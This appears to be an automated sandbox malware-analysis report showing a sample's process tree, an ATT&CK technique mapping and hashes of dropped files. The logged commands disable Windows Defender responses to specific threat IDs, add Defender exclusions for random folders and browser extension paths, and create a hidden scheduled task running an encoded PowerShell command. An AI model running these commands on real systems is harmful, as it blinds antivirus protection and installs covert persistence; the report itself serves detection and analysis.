C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\sXXaMmB.exe RD /GPsite_idTzJ 525403 /S
1⤵
PID:4472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:1272

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:1612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:2592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:2208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:2720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:3160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:4432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:3628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:2160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:3984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:944

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4124

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:32
3⤵
PID:876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:64
3⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:32
3⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:64
3⤵
PID:1348

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDjbebkHa" /SC once /ST 08:33:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3728

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDjbebkHa"
2⤵
PID:2900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3404

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
Filesize
4.1MB

MD5
19f09a85eed41fceb243d08287bbc2c4

SHA1
d5083aa6a0c64064053657b2b15f0b215fbbfeae

SHA256
94b3e0aab4f848ef18e3a622cbf33c6b9f96efa61007f88a6454cbddbec79842

SHA512
18e4f5ada504294469e80c2750140cbe0da4486b03846ad4b03fd9aa491833ec5c166338d9a70810aefed3ec2146ccc32f3c26c1e3347fc3faf46e5c539e3908

Download Submit
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
Filesize
4.1MB

MD5
05cc298eb7e32124eecaad2e3a66ac01

SHA1
34f4d568b12f55cf2dac384e1a2e5a0217531188

SHA256
54cee41fc65af8833dff9c232a6065094bbd4a9fd5addd1dc3af64ec73a95523

SHA512
cec4b325930413f1564b36845435451e0500e89a1b3487179649edf5b5ae2b43c88f2abbb5ce3ecc1a09b1c1d78102114751bd5409f28ed3a85952c37dabde70

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
a6ea7bfcd3aac150c0caef765cb52281

SHA1
037dc22c46a0eb0b9ad4c74088129e387cffe96b

SHA256
f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9

SHA512
c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4C85.tmp\Install.exe
Filesize
6.4MB

MD5
7cd17d00c4a696a4d641661855667a43

SHA1
5362473747a83e986738796b1cd6078a60a523c1

SHA256
c5ec6e9d74dadb1a705d6558e3bf5cc872bef84f3f66d4decac90bad1de52522

SHA512
68edbee61d2754452ec179fa6f3213d9d6988c6f889967cb11edbf76fb189c91734e40c2b7785d865c9c0ce4b63ee77159b87774d3c6fd91987ac908878727c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4C85.tmp\Install.exe
Filesize
6.3MB

MD5
7f3b2f042a4a028047325e274c0a7b50

SHA1
2a3a0786b40633d88ac1af7aca3c4e0c688cf514

SHA256
4b3f9faa580badad4ed118081455201bed3435e3df1a626c15608331d710f96d

SHA512
937007cfcdad74bc89ce991fd071fd0f42c785360c5e44716cd2bfb78329d95b79095da41c78725f9832464c984ab5ded81ad3791fad71f891620ae2da46a2ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5781.tmp\Install.exe
Filesize
5.6MB

MD5
8cc6e4947b0e5b48dced5420f0ac482a

SHA1
27a69a9697581b16078bce0c689bcfee18489c72

SHA256
ab27e7a5e26fadb02309dd24c068e66ebbbbf603e0114c63dfd4a8233cd8b6a3

SHA512
39ce7437d8fbc0f9b38d9618a03166291d74adfb9471b7f535b510b95eae60fb78ac28cb48d2deda52b34b905ca1bb5881fda4654fafd07b5891ebc8bd54039a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5781.tmp\Install.exe
Filesize
1.6MB

MD5
09c1088ad6841eb705e5e07e8d32b1d8

SHA1
bee0b7c0731249c1e65adc652440d8c8c73c805a

SHA256
94051dc2550748beef42be4734ec9fcdbc380766c5fb017693f8d7c72d17766c

SHA512
e26c89045b6c6591632d9088f68b5bebad66a0aa501af86a8c10f7a094ed1567677ce53b2ddea6efd89ec0764e5e5d2e7ae53672ddcd4b9d77cd2523389d25b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe
Filesize
106KB

MD5
fe380780b5c35bd6d54541791151c2be

SHA1
7fe3a583cf91474c733f85cebf3c857682e269e1

SHA256
